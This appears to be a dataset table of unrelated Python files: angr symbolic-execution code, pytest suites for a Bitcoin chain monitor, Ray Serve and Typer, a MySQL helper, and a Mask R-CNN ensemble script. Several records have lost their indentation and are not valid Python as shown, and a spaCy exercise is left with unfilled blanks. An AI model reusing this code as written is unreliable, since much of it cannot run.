id | content
---|---
469253
|
import angr

class gethostbyname(angr.SimProcedure):
    def run(self, name):
        # Allocate a struct hostent (32 bytes on a 64-bit layout, which is
        # assumed here) and fill each field with a fresh symbolic value at its
        # own offset, instead of overwriting a single address five times.
        malloc = angr.SIM_PROCEDURES['libc']['malloc']
        place = self.inline_call(malloc, 32).ret_expr
        self.state.memory.store(place, self.state.solver.BVS('h_name', 64, key=('api', 'gethostbyname', 'h_name')), endness='Iend_LE')
        self.state.memory.store(place + 8, self.state.solver.BVS('h_aliases', 64, key=('api', 'gethostbyname', 'h_aliases')), endness='Iend_LE')
        self.state.memory.store(place + 16, self.state.solver.BVS('h_addrtype', 32, key=('api', 'gethostbyname', 'h_addrtype')), endness='Iend_LE')
        self.state.memory.store(place + 20, self.state.solver.BVS('h_length', 32, key=('api', 'gethostbyname', 'h_length')), endness='Iend_LE')
        self.state.memory.store(place + 24, self.state.solver.BVS('h_addr_list', 64, key=('api', 'gethostbyname', 'h_addr_list')), endness='Iend_LE')
        return place
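
# Illustrative wiring only (not in the original snippet): hook the procedure so
# that calls to gethostbyname in a target binary return the symbolic struct
# built above. The binary path is a placeholder assumption.
if __name__ == '__main__':
    proj = angr.Project('./target_binary', auto_load_libs=False)
    proj.hook_symbol('gethostbyname', gethostbyname())
    simgr = proj.factory.simulation_manager(proj.factory.entry_state())
    simgr.run()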
|
469278
|
import zmq
import time
import pytest
from queue import Queue
from threading import Thread, Event, Condition
from teos.chain_monitor import ChainMonitor, ChainMonitorStatus
from test.teos.conftest import generate_blocks, generate_blocks_with_delay
from test.teos.unit.conftest import get_random_value_hex, bitcoind_feed_params, mock_connection_refused_return
def test_init(block_processor_mock):
# Not much to test here, just sanity checks to make sure nothing goes south in the future
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor_mock, bitcoind_feed_params)
assert chain_monitor.status == ChainMonitorStatus.IDLE
assert isinstance(chain_monitor.last_tips, list) and len(chain_monitor.last_tips) == 0
assert chain_monitor.status == ChainMonitorStatus.IDLE
assert isinstance(chain_monitor.check_tip, Event)
assert isinstance(chain_monitor.lock, Condition)
assert isinstance(chain_monitor.zmqSubSocket, zmq.Socket)
assert isinstance(chain_monitor.receiving_queues[0], Queue)
assert isinstance(chain_monitor.receiving_queues[1], Queue)
def test_notify_subscribers(block_processor_mock):
queue1 = Queue()
queue2 = Queue()
chain_monitor = ChainMonitor([queue1, queue2], block_processor_mock, bitcoind_feed_params)
# Queues should be empty to start with
assert queue1.qsize() == 0
assert queue2.qsize() == 0
block1 = get_random_value_hex(32)
block2 = get_random_value_hex(32)
block3 = get_random_value_hex(32)
# we add two elements to the internal queue before the thread is started
chain_monitor.queue.put(block1)
chain_monitor.queue.put(block2)
assert queue1.qsize() == 0
assert queue2.qsize() == 0
notifying_thread = Thread(target=chain_monitor.notify_subscribers, daemon=True)
notifying_thread.start()
# the existing elements should be processed soon and in order for all queues
for q in [queue1, queue2]:
assert q.get(timeout=0.1) == block1
assert q.get(timeout=0.1) == block2
# Subscribers are only notified as long as they are awake
chain_monitor.queue.put(block3)
assert queue1.get(timeout=0.1) == block3
assert queue2.get(timeout=0.1) == block3
chain_monitor.terminate()
def test_enqueue(block_processor_mock):
# The state is updated after receiving a new block (and only if the block is not already known).
# Let's start by adding some hashes to last_tips
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor_mock, bitcoind_feed_params)
chain_monitor.last_tips = [get_random_value_hex(32) for _ in range(5)]
    # Now we can try to update the state with a hash that has already been seen and check that it is rejected
assert chain_monitor.enqueue(chain_monitor.last_tips[0]) is False
# The state should be correctly updated with a new block hash, which should be added as last element of last_tips
another_block_hash = get_random_value_hex(32)
assert chain_monitor.enqueue(another_block_hash) is True
assert chain_monitor.last_tips[-1] == another_block_hash
def test_monitor_chain_polling(block_processor_mock, monkeypatch):
# Monkeypatch the BlockProcessor so the best tip remains unchanged
fixed_tip = get_random_value_hex(32)
monkeypatch.setattr(block_processor_mock, "get_best_block_hash", lambda blocking: fixed_tip)
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor_mock, bitcoind_feed_params)
chain_monitor.last_tips = [fixed_tip]
chain_monitor.polling_delta = 0.1
# monitor_chain_polling runs until not terminated
polling_thread = Thread(target=chain_monitor.monitor_chain_polling, daemon=True)
polling_thread.start()
# Check that nothing changes as long as a block is not generated
for _ in range(5):
assert chain_monitor.queue.empty()
time.sleep(0.1)
# And that it does if we generate a block
monkeypatch.setattr(block_processor_mock, "get_best_block_hash", lambda blocking: get_random_value_hex(32))
time.sleep(0.1)
chain_monitor.queue.get()
assert chain_monitor.queue.empty()
# Check that the bitcoind_reachable event is cleared if the connection is lost, and set once it's recovered
monkeypatch.setattr(block_processor_mock, "get_best_block_hash", mock_connection_refused_return)
time.sleep(0.5)
assert not chain_monitor.bitcoind_reachable.is_set()
monkeypatch.delattr(block_processor_mock, "get_best_block_hash")
time.sleep(0.5)
assert chain_monitor.bitcoind_reachable.is_set()
chain_monitor.terminate()
# This test needs bitcoind since the zmq interface is tested here.
def test_monitor_chain_zmq(block_processor):
responder_queue = Queue()
chain_monitor = ChainMonitor([Queue(), responder_queue], block_processor, bitcoind_feed_params)
chain_monitor.last_tips = [block_processor.get_best_block_hash()]
zmq_thread = Thread(target=chain_monitor.monitor_chain_zmq, daemon=True)
zmq_thread.start()
# The internal queue should start empty
assert chain_monitor.queue.empty()
# And have a new block every time we generate one
for _ in range(3):
generate_blocks(1)
chain_monitor.queue.get()
assert chain_monitor.queue.empty()
chain_monitor.terminate()
# The zmq thread needs a block generation to release from the recv method.
generate_blocks(1)
def test_monitor_chain(block_processor):
# We don't activate it but we start listening; therefore received blocks should accumulate in the internal queue
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor, bitcoind_feed_params)
chain_monitor.polling_delta = 0.1
chain_monitor.monitor_chain()
assert chain_monitor.status == ChainMonitorStatus.LISTENING
# The tip is updated before starting the threads, so it should have been added to last_tips.
assert len(chain_monitor.last_tips) > 0
# Blocks should be received and added to the queue
count = 0
for _ in range(5):
generate_blocks(1)
count += 1
time.sleep(0.11) # higher than the polling interval
assert chain_monitor.receiving_queues[0].empty()
assert chain_monitor.receiving_queues[1].empty()
assert chain_monitor.queue.qsize() == count
chain_monitor.terminate()
# The zmq thread needs a block generation to release from the recv method.
generate_blocks(1)
def test_monitor_chain_wrong_status_raises(block_processor_mock, monkeypatch):
# Calling monitor_chain when not idle should raise
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor_mock, bitcoind_feed_params)
for status in ChainMonitorStatus:
if status != ChainMonitorStatus.IDLE:
monkeypatch.setattr(chain_monitor, "status", status)
with pytest.raises(RuntimeError, match="can only be called in IDLE status"):
chain_monitor.monitor_chain()
# This needs bitcoind since the zmq thread is also used
def test_activate(block_processor):
# Not much to test here, this should launch two threads (one per monitor approach) and finish on terminate
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor, bitcoind_feed_params)
chain_monitor.monitor_chain()
chain_monitor.activate()
assert chain_monitor.status == ChainMonitorStatus.ACTIVE
    # last_tips is updated before starting the threads, so it should not be empty now.
assert len(chain_monitor.last_tips) > 0
# Blocks should be received
for _ in range(5):
generate_blocks(1)
watcher_block = chain_monitor.receiving_queues[0].get()
responder_block = chain_monitor.receiving_queues[1].get()
assert watcher_block == responder_block
assert chain_monitor.receiving_queues[0].empty()
assert chain_monitor.receiving_queues[1].empty()
chain_monitor.terminate()
# The zmq thread needs a block generation to release from the recv method.
generate_blocks(1)
def test_activate_wrong_status_raises(block_processor_mock):
# calling activate when not listening should raise
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor_mock, bitcoind_feed_params)
for status in ChainMonitorStatus:
if status != ChainMonitorStatus.LISTENING:
chain_monitor.status = status # mock the status
with pytest.raises(RuntimeError, match="can only be called in LISTENING status"):
chain_monitor.activate()
# This needs bitcoind since the zmq thread is also used
def test_monitor_chain_single_update(block_processor):
    # This test checks that if both threads try to add the same block to the queue, only the first one makes it
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor, bitcoind_feed_params)
chain_monitor.polling_delta = 1
# We will create a block and wait for the polling thread. Then check the queues to see that the block hash has only
# been added once.
chain_monitor.monitor_chain()
chain_monitor.activate()
generate_blocks(1)
assert len(chain_monitor.receiving_queues) == 2
queue0_block = chain_monitor.receiving_queues[0].get()
queue1_block = chain_monitor.receiving_queues[1].get()
assert queue0_block == queue1_block
assert chain_monitor.receiving_queues[0].empty()
assert chain_monitor.receiving_queues[1].empty()
# The delta for polling is 1 sec, so let's wait and see
time.sleep(2)
assert chain_monitor.receiving_queues[0].empty()
assert chain_monitor.receiving_queues[1].empty()
# We can also force an update and see that it won't go through
assert chain_monitor.enqueue(queue0_block) is False
chain_monitor.terminate()
# The zmq thread needs a block generation to release from the recv method.
generate_blocks(1)
# This needs bitcoind since the zmq thread is also used
def test_monitor_chain_and_activate(block_processor):
    # In this test, we generate some blocks after `monitor_chain`, then `activate` and generate a few more blocks.
# We verify that all the generated blocks are indeed sent to the queues in the right order.
queue1 = Queue()
queue2 = Queue()
# We add some initial blocks to the receiving queues, to simulate a bootstrap with previous information
pre_blocks = [get_random_value_hex(32) for _ in range(5)]
for block in pre_blocks:
queue1.put(block)
queue2.put(block)
# We don't activate the ChainMonitor but we start listening; therefore received blocks should accumulate in the
# internal queue
chain_monitor = ChainMonitor([queue1, queue2], block_processor, bitcoind_feed_params)
chain_monitor.polling_delta = 0.1
chain_monitor.monitor_chain()
assert chain_monitor.status == ChainMonitorStatus.LISTENING
# we generate some blocks while the monitor is listening but not active
init_blocks = generate_blocks_with_delay(3, 0.15)
time.sleep(0.11) # higher than the polling interval
chain_monitor.activate()
# generate some more blocks after activating
after_blocks = generate_blocks_with_delay(3, 0.15)
# we now check that all the blocks are in the receiving queues in the correct order
all_blocks = pre_blocks + init_blocks + after_blocks
for block in all_blocks:
assert queue1.get(timeout=0.1) == block
assert queue2.get(timeout=0.1) == block
chain_monitor.terminate()
# The zmq thread needs a block generation to release from the recv method.
generate_blocks(1)
def test_terminate(block_processor_mock, monkeypatch):
# Test that the ChainMonitor is stopped on a terminate signal
queue = Queue()
chain_monitor = ChainMonitor([queue, Queue()], block_processor_mock, bitcoind_feed_params)
chain_monitor.polling_delta = 0.1
# Activate the monitor
chain_monitor.monitor_chain()
chain_monitor.activate()
# Ask it to terminate
chain_monitor.terminate()
assert chain_monitor.status == ChainMonitorStatus.TERMINATED
    # Mock the generation of a new block
monkeypatch.setattr(block_processor_mock, "get_best_block_hash", lambda blocking: get_random_value_hex(32))
time.sleep(0.11) # wait longer than the polling_delta
# there should be only the ChainMonitor.END_MESSAGE message in the receiving queue, as the new block was generated
# after terminating
assert queue.qsize() == 1
assert queue.get() == ChainMonitor.END_MESSAGE
def test_threads_stop_when_terminated(block_processor):
# When status is "terminated", the methods running the threads should stop immediately
chain_monitor = ChainMonitor([Queue(), Queue()], block_processor, bitcoind_feed_params)
chain_monitor.terminate()
    # If any of the functions does not exit immediately, the test will time out
chain_monitor.monitor_chain_polling()
chain_monitor.monitor_chain_zmq()
chain_monitor.notify_subscribers()
|
469284
|
import contextlib
import os
import dotenv
import mysql.connector
import reseval
def create(config):
"""Create a local MySQL database"""
# Load environment variables
dotenv.load_dotenv(reseval.ENVIRONMENT_FILE)
# Create connection
with connect() as (_, cursor):
# Create database
# TEMPORARY - drop database
try:
cursor.execute(f'CREATE DATABASE `{config["name"]}`')
except Exception:
cursor.execute(f'DROP DATABASE `{config["name"]}`')
cursor.execute(f'CREATE DATABASE `{config["name"]}`')
# Return credentials
return {
'MYSQL_DBNAME': config['name'],
'MYSQL_HOST': os.environ['MYSQL_HOST'],
'MYSQL_USER': os.environ['MYSQL_USER'],
'MYSQL_PASS': os.environ['MYSQL_PASS']}
def destroy(config):
"""Destroy a local MySQL database"""
# Create connection
with connect() as (_, cursor):
# Destroy database
cursor.execute(f'DROP DATABASE `{config["name"]}`')
###############################################################################
# Utilities
###############################################################################
@contextlib.contextmanager
def connect():
"""Connect to a local MySQL database"""
try:
# Connect to the database
connection = mysql.connector.connect(
host=os.environ['MYSQL_HOST'],
user=os.environ['MYSQL_USER'],
password=os.environ['MYSQL_PASS'])
# Create cursor to execute commands
cursor = connection.cursor()
# Execute user code
yield connection, cursor
finally:
# Close database connection
if 'cursor' in locals():
cursor.close()
if 'connection' in locals():
connection.close()
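
# Illustrative helper (not part of the original module) showing how the
# connect() context manager above can be used; SHOW DATABASES is standard MySQL.
def list_databases():
    """List the names of all databases on the configured server"""
    with connect() as (_, cursor):
        cursor.execute('SHOW DATABASES')
        return [row[0] for row in cursor.fetchall()]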
|
469296
|
import pytest
from ray.serve.utils import get_random_letters
from ray.serve.common import ReplicaName
def test_replica_tag_formatting():
deployment_tag = "DeploymentA"
replica_suffix = get_random_letters()
replica_name = ReplicaName(deployment_tag, replica_suffix)
assert replica_name.replica_tag == f"{deployment_tag}#{replica_suffix}"
assert str(replica_name) == f"{deployment_tag}#{replica_suffix}"
def test_replica_name_from_str():
replica_suffix = get_random_letters()
actor_name = f"{ReplicaName.prefix}DeploymentA#{replica_suffix}"
replica_name = ReplicaName.from_str(actor_name)
assert (
str(replica_name)
== replica_name.replica_tag
== actor_name.replace(ReplicaName.prefix, "")
)
def test_invalid_name_from_str():
replica_suffix = get_random_letters()
replica_tag = f"DeploymentA##{replica_suffix}"
with pytest.raises(AssertionError):
ReplicaName.from_str(replica_tag)
# No prefix
replica_tag = f"DeploymentA#{replica_suffix}"
with pytest.raises(AssertionError):
ReplicaName.from_str(replica_tag)
def test_is_replica_name():
replica_suffix = get_random_letters()
assert not ReplicaName.is_replica_name(f"DeploymentA##{replica_suffix}")
assert not ReplicaName.is_replica_name(f"DeploymentA#{replica_suffix}")
assert ReplicaName.is_replica_name(
f"{ReplicaName.prefix}DeploymentA#{replica_suffix}"
)
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
|
469302
|
import subprocess
def test_script_help():
result = subprocess.run(
[
"coverage",
"run",
"-m",
"typer_cli",
"tests/assets/app_other_name.py",
"run",
"--help",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
)
assert "--name" in result.stdout
def test_script():
result = subprocess.run(
[
"coverage",
"run",
"-m",
"typer_cli",
"tests/assets/app_other_name.py",
"run",
"--name",
"Camila",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
)
assert "Hello Camila" in result.stdout
|
469391
|
import csv
import os
import unittest
import numpy as np
class TestCSV2RH(unittest.TestCase):
def setUp(self):
rng = np.random.RandomState(42)
self.path_to_csv = "test/test_files/utils/csv2rh/"
def _write2csv(self, fn, data):
path = os.path.join(self.path_to_csv, fn)
with open(path, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
for row in data:
writer.writerow(row)
|
469394
|
import logging
import os
import urllib.request
"""
This is a simple sample that downloads a JSON-formatted geocoding response for an address and writes the output to a directory
"""
class SampleProcess:
def __init__(self, uri="http://maps.googleapis.com/maps/api/geocode/json?address=google"):
self.uri = uri
@property
def logger(self):
return logging.getLogger(__name__)
def run(self, output_dir):
output_filename = os.path.join(output_dir, "sample.json")
self.logger.info("Downloading from {} to {}".format(self.uri, output_filename))
with urllib.request.urlopen(self.uri) as url:
data = url.read().decode()
        self.logger.debug("Writing {} to {}".format(data, output_filename))
with open(output_filename, "w") as out:
out.write(data)
self.logger.info("Download complete..")
return output_filename
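
# Minimal driver sketch (not part of the original sample); the output directory
# and logging configuration are assumptions chosen for demonstration.
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    SampleProcess().run(os.getcwd())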
|
469399
|
import json
from spacy.lang.es import Spanish
from spacy.tokens import Span
from spacy.matcher import PhraseMatcher
with open("exercises/es/countries.json", encoding="utf8") as f:
COUNTRIES = json.loads(f.read())
with open("exercises/es/capitals.json", encoding="utf8") as f:
CAPITALS = json.loads(f.read())
nlp = Spanish()
matcher = PhraseMatcher(nlp.vocab)
matcher.add("COUNTRY", None, *list(nlp.pipe(COUNTRIES)))
def countries_component(doc):
    # Create an entity Span with the label "LOC" for all of the matches
matches = matcher(doc)
doc.ents = [____(____, ____, ____, label=____) for match_id, start, end in matches]
return doc
# Add the component to the pipeline
____.____(____)
print(nlp.pipe_names)
# The getter that looks up the span text in a dictionary of countries'
# capital cities
get_capital = lambda span: CAPITALS.get(span.text)
# Register the Span attribute extension "capital" with the
# getter get_capital
____.____(____, ____)
# Process the text and print the entity text, the label, and the
# "capital" attribute for each entity
doc = nlp(
"La República Checa podría ayudar a la República Eslovaca "
"a proteger su espacio aéreo"
)
print([(____, ____, ____) for ent in doc.ents])
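# --- Not part of the original exercise: one possible completion of the blanks
# above, assuming the spaCy v2 API implied by `matcher.add("COUNTRY", None, ...)`.
#
# doc.ents = [Span(doc, start, end, label="LOC") for match_id, start, end in matches]
# nlp.add_pipe(countries_component)
# Span.set_extension("capital", getter=get_capital)
# print([(ent.text, ent.label_, ent._.capital) for ent in doc.ents])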
|
469424
|
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import multiprocessing
from functools import partial
from pathlib import Path
import skimage.io
import scipy.ndimage as ndimage
import sys, os
sys.path.insert(1, os.path.join(sys.path[0], '../pytorch-mask-rcnn'))
from adriving_util import *
from visualize import *
import skimage.morphology
import skimage.transform
from tqdm import tqdm
import pickle
import time
from unionfind import UnionFind
import json
with open('../../settings.json') as f:
setting = json.load(f)
SC_TH = 0.5
PX_TH = 50
prediction_folder_list = []
output_folder = 'dummy'
def compute_iou_masks_partial_bck(masks1, mask2):
    '''Computes partial overlaps (intersection over the area of each mask in
    masks1) between a set of masks and a single mask.
    masks1: [Height, Width, N], mask2: [Height, Width]
    '''
# flatten masks
masks1 = np.reshape(masks1, (-1, masks1.shape[-1])).astype(bool)
mask2 = np.reshape(mask2, -1).astype(bool)
area1 = np.sum(masks1, axis = 0) + 1e-3
area2 = np.repeat(np.sum(mask2), masks1.shape[-1])
# return area1, area2
# intersections and union
intersections = np.dot(masks1.T, mask2)
union = area1 + area2 - intersections
overlaps = intersections / area1
return overlaps
def compute_iou_masks_partial(masks1, mask2):
    '''Computes partial overlaps (intersection over the area of each mask in
    masks1) between a set of masks and a single mask.
    masks1: [Height, Width, N], mask2: [Height, Width]
    '''
# flatten masks
# mask2 = np.repeat(mask2[:, :, np.newaxis], masks1.shape[2], axis=2)
area1 = np.sum(masks1, axis = (0,1)) + 1e-3
area2 = np.array([np.sum(mask2)] * masks1.shape[2])
# return area1, area2
# intersections and union
intersections = []
for i in range(masks1.shape[2]):
intersections.append(np.sum(masks1[:, :, i] * mask2))
intersections = np.array(intersections)
# print(intersections)
union = area1 + area2 - intersections
overlaps = intersections / area1
return overlaps
def compute_iou_masksets_partial(masks1, masks2):
results = np.zeros([masks1.shape[-1], masks2.shape[-1]])
for n in range(masks2.shape[-1]):
# print(n)
results[:, n] = compute_iou_masks_partial(masks1, masks2[:, :, n])
return results
import scipy.ndimage.measurements
def remove_disconnected_instance(mask_this):
mask_label, num_features = scipy.ndimage.measurements.label(mask_this)
n_pixels = []
if num_features <= 1:
return mask_this
    # count pixels per labelled component (labels start at 1; 0 is background)
    for n in range(1, num_features + 1):
        n_pixels.append(np.sum(mask_label == n))
    n_pixels = np.array(n_pixels)
    # keep only the largest connected component
    index = np.argmax(n_pixels)
    return mask_label == (index + 1)
def remove_disconnected(mask_instance):
mask_remove = np.zeros(mask_instance.shape, dtype = bool)
for n in range(mask_instance.shape[2]):
mask_remove[:, :, n] = remove_disconnected_instance(mask_instance[:, :, n])
return mask_remove
def remove_duplicates_instance_to_mask(mask, class_ids, score, PX_TH = 20, SC_TH = 0.3):
    mask_resize = mask[::5, ::5, :]
iou_matrix = compute_iou_masksets_partial(mask_resize, mask_resize)
uf = UnionFind(list(range(mask.shape[2])))
overlap = list()
for i in range(mask.shape[2]):
for j in range(mask.shape[2]):
if i == j:
continue
else:
if iou_matrix[i, j] > 0.8 and class_ids[i] == class_ids[j]:
uf.union(i, j)
overlap.append(i)
overlap.append(j)
overlap = np.unique(overlap)
keep = []
for n in range(iou_matrix.shape[0]):
if n not in overlap:
keep.append(n)
# print('keep', keep)
mask_instance_new = mask[:, :, keep]
class_ids_new = list(class_ids[keep])
score_new = list(score[keep])
merged_sets = []
for n, pair in enumerate(uf.components()):
if len(pair) >= 2:
merged_sets.append(pair)
mask_instance_merged = np.zeros([mask.shape[0],
mask.shape[1], len(merged_sets)],
dtype = bool)
for n, pair in enumerate(merged_sets):
mask_instance_merged[:, :, n] = np.zeros([mask.shape[0],
mask.shape[1]],
dtype = bool)
scores_this_set = []
index_this_set = []
class_id_this_set = []
px_num_this_set = []
for p in pair:
scores_this_set.append(score[p])
index_this_set.append(p)
class_id_this_set.append(class_ids[p])
px_num_this_set.append(np.sum(mask[:, :, p], axis = (0, 1)))
index = np.argmax(np.array(scores_this_set))
mask_instance_merged[:, :, n] = mask[:, :, index_this_set[index]]
class_ids_new.append(class_id_this_set[index])
score_new.append(scores_this_set[index])
# print('before', mask_instance_new.shape)
mask_instance_new = np.dstack((mask_instance_new, mask_instance_merged))
# mask_instance_new = mask_instance_merged
class_ids_pred = np.array(class_ids_new)
scores_pred = np.array(score_new)
# print('after', mask_instance_new.shape)
n_px_per_instance = np.sum(mask_instance_new, axis = (0, 1))
instance_keep = np.where(np.logical_and((n_px_per_instance > PX_TH) , (scores_pred > SC_TH)))[0]
if len(instance_keep) == 0:
return None, None
# print(instance_keep)
instance_reorder = instance_keep[np.argsort(scores_pred[instance_keep])]
# print(instance_reorder)
score_reorder = scores_pred[instance_reorder]
class_ids_reorder = class_ids_pred[instance_reorder]
mask_reorder = mask_instance_new[:, :, instance_reorder]
mask_reorder = remove_disconnected(mask_reorder)
# print(mask_reorder.shape)
# mask_reorder = fill_and_remove(mask_reorder)
mask, instance_score = instance_to_mask(mask_reorder, class_ids_reorder,
score_reorder,
order_by_score = False)
return mask, instance_score
import skimage.morphology
def fill_and_remove(mask_instance):
    # Fill small holes in each instance mask with a morphological closing,
    # using a larger structuring element for large instances.
    mask_instance_filled = mask_instance.copy()
    for n in range(mask_instance.shape[2]):
        n_pixels = np.sum(mask_instance[:, :, n])
        if n_pixels > 5000:
            selem = skimage.morphology.disk(3)
        else:
            selem = skimage.morphology.disk(1)
        mask_instance_filled[:, :, n] = skimage.morphology.binary_closing(mask_instance[:, :, n], selem)
    return mask_instance_filled
def get_prediction_from_csv(prediction, image_id):
prediction_this_image = prediction.loc[prediction['ImageId'] == image_id]
num_instances = len(prediction_this_image)
mask_pred_list = list()
# mask_pred = np.zeros([2710, 3384, num_instances], dtype = bool)
class_ids_pred = np.zeros(num_instances, dtype = int)
score_ids_pred = np.zeros(num_instances, dtype = float)
for n in range(num_instances):
rle = prediction_this_image.iloc[n]['EncodedPixels']
mask_pred_list.append(rle_decode(rle, (2710, 3384)).astype(bool))
# assert(np.sum(mask_pred[:,:, n]) == int(prediction_this_image.iloc[n]['PixelCount']))
class_ids_pred[n] = label_to_class[int(prediction_this_image.iloc[n]['LabelId'])]
score_ids_pred[n] = float(prediction_this_image.iloc[n]['Confidence'])
return mask_pred_list, class_ids_pred, score_ids_pred
def get_prediction_and_csv(prediction_folder_list, image_id):
class_ids_pred_list = []
scores_pred_list = []
mask_pred_list = []
for prediction_folder in prediction_folder_list:
if os.path.isdir(prediction_folder):
if not os.path.isfile(prediction_folder + '/'+ image_id + '.p'):
continue
with open(prediction_folder + '/'+ image_id + '.p', 'rb') as f:
prediction = pickle.load(f)
#print(prediction)
class_ids_pred = prediction['class_ids']
class_ids_pred_list += class_ids_pred.tolist()
scores_pred = prediction['scores']
scores_pred_list += scores_pred.tolist()
for n in range(len(class_ids_pred)):
mask_pred = np.zeros([2710, 3384], dtype = bool)
h, w = prediction['masks'][0].toarray().shape
if h == 2048:
mask_pred[-2048:, :] = prediction['masks'][n].toarray()[:, 100:(100+3384)]
else:
mask_recover = prediction['masks'][n].toarray()
mask_recover = skimage.transform.resize(
mask_recover, (2*h, 2*w),
order=0, mode="constant", preserve_range=True)
mask_pred[-2048:, :] = mask_recover[:, 100:(100+3384)]
mask_pred_list.append(mask_pred.astype(bool))
else:
prediction_file = pd.read_csv(prediction_folder)
image_list = list(np.unique(prediction_file.ImageId))
if image_id not in (image_list):
continue
mask_pred, class_ids_pred, scores_pred = get_prediction_from_csv(prediction_file, image_id)
class_ids_pred_list += class_ids_pred.tolist()
scores_pred_list += scores_pred.tolist()
mask_pred_list += mask_pred
return np.stack(mask_pred_list, axis = -1), np.array(class_ids_pred_list), np.array(scores_pred_list)
def read_and_rle(image_id, prediction_folder_list=prediction_folder_list,
output_folder=output_folder, SC_TH = 0.3, PX_TH = 20):
mask_pred, class_ids_pred, scores_pred = get_prediction_and_csv(prediction_folder_list, image_id)
# pipeline:
n_px_per_instance = np.sum(mask_pred, axis = (0, 1))
instance_keep = np.where(np.logical_and((n_px_per_instance > PX_TH) , (scores_pred > SC_TH)))[0]
# print(instance_keep)
if len(instance_keep) == 0:
return 0
instance_reorder = instance_keep[np.argsort(scores_pred[instance_keep])]
score_reorder = scores_pred[instance_reorder]
class_ids_reorder = class_ids_pred[instance_reorder]
mask_reorder = mask_pred[:, :, instance_reorder]
# mask_reorder = fill_and_remove(mask_reorder)
# print(class_ids_reorder)
mask, instance_score = remove_duplicates_instance_to_mask(mask_reorder, class_ids_reorder,
score_reorder,
SC_TH = SC_TH, PX_TH = PX_TH)
# pipeline_end
if mask is not None:
rle_string_list = write_mask(image_id, mask, score = instance_score)
fileoutput_name = output_folder + '/'+ image_id + '.csv'
with open(fileoutput_name, 'w+') as prediction_file:
for rle_str in rle_string_list:
prediction_file.write(rle_str)
prediction_file.write('\n')
return 0
if __name__ == '__main__':
import argparse
# Parse command line arguments
parser = argparse.ArgumentParser(
description='Train Mask R-CNN on MS COCO.')
parser.add_argument('--px_th', required=False,
default=50,
metavar="<px>",
help='px')
parser.add_argument('--sc_th', required=False,
default=0.1,
metavar="<sc>",
help='px')
args = parser.parse_args()
PX_TH = int(args.px_th)
SC_TH = float(args.sc_th)
# prediction_folder_list = ['test_resnet_v2_201806010_00_mask_th_0.5_nms_th_0.8_Scale_1_Flip_False_DT_NMS_TH_0.3',
# 'test_20180521_00_mask_th0.35_nms_th_0.6_Scale_1Flip_False',
# 'test_20180521_00_mask_th0.35_nms_th_0.6_Scale_1Flip_True',
# 'test_20180506_01_px_30sc_0.5.csvpx20_th0.5.csv' ]
prediction_folder_list = os.listdir(os.path.join('../../', setting['SUBMISSION_DIR'], 'ensemble'))
prediction_folder_list = [x for x in prediction_folder_list if not x.startswith('.')]
prediction_folder_list = [os.path.join('../../', setting['SUBMISSION_DIR'], 'ensemble', x) for x in prediction_folder_list]
print(prediction_folder_list)
# output_folder = ''
# for prediction_folder in prediction_folder_list:
# output_folder += prediction_folder + '_'
# output_folder = output_folder + '_px_{}sc_{}_ensemble_keep'.format(PX_TH, SC_TH)
output_folder = 'final_prediction' + '_px_{}sc_{}'.format(PX_TH, SC_TH)
output_folder = os.path.join('../../', setting['SUBMISSION_DIR'], output_folder)
os.makedirs(output_folder)
# output_folder = prediction_folder + '_px_{}sc_{}'.format(PX_TH, SC_TH)
image_list = []
for prediction_folder in prediction_folder_list:
if os.path.isdir(prediction_folder):
image_list_this = os.listdir(prediction_folder)
image_list_this = [x[:-2] for x in image_list_this if x[0] != '.']
else:
prediction_file = pd.read_csv(prediction_folder)
image_list_this = list(np.unique(prediction_file.ImageId))
image_list += image_list_this
image_list = list(set(image_list))
image_list = sorted(image_list)
print(len(image_list))
# image_list = image_list[195:]
n_core = min(multiprocessing.cpu_count(), 4)
with multiprocessing.Pool(n_core) as p:
r = list(tqdm(p.imap(partial(read_and_rle,
prediction_folder_list=prediction_folder_list,
output_folder=output_folder,
SC_TH = SC_TH, PX_TH = PX_TH),
image_list),
total=len(image_list)))
output_file = output_folder + '.csv'
filenames = os.listdir(output_folder)
filenames = [x for x in filenames if x[0] != '.']
filenames = sorted(filenames)
filenames = [os.path.join(output_folder, x) for x in filenames]
outfile_list = []
for fname in filenames:
with open(fname) as infile:
for line in infile:
line = line[:-1]
outfile_list.append(line.split(','))
out_file = pd.DataFrame(outfile_list, columns = ['ImageId','LabelId','Confidence','PixelCount','EncodedPixels'])
out_file['PixelCount'] = (out_file['PixelCount']).astype(int)
out_file['LabelId'] = (out_file['LabelId']).astype(int)
out_file['Confidence'] = (out_file['Confidence']).astype(float)
out_file = out_file.loc[out_file.PixelCount > PX_TH]
out_file = out_file.sort_values(['ImageId', 'Confidence'], ascending=[True, False])
out_file.to_csv(output_file, index = False)
|
469429
|
import numpy as np
import pandas as pd
import pytest
from gama.data_loading import (
arff_to_pandas,
X_y_from_file,
load_feature_metadata_from_file,
load_feature_metadata_from_arff,
sniff_csv_meta,
csv_to_pandas,
load_csv_header,
file_to_pandas,
)
NUMERIC_TYPES = [np.int, np.int32, np.int64, np.float]
# https://www.openml.org/d/23380
METADATA_23380 = {
"N": "INTEGER",
"TR": "{EL_500_20g/L,EL_500_4g/L,PP_333_20g/L,PP_333_4g/L,control,methanol_control}",
"TREE": "{D10,D13,D14,D16,D18,D19,D20,D21,D22,G10,G2,G20,G21,G24,G27,G28,G29,G4,G5,G6,G7,G8,G9,J1,J10,J12,J13,J15,J17,J19,J20,J25,J27,J29,J31,J6,J8,M10,M17,M20,M25,M33,M6,O20,O27,O28,O33,O3O,Q12,Q17,Q19,Q23,Q25,Q3,Q34,Q4,Q5}",
"BR": "{A,B,C,D,E,F,G,H,I,J}",
"TL": "REAL",
"IN": "INTEGER",
**{f"INTERNODE_{i}": "REAL" for i in range(1, 30)},
}
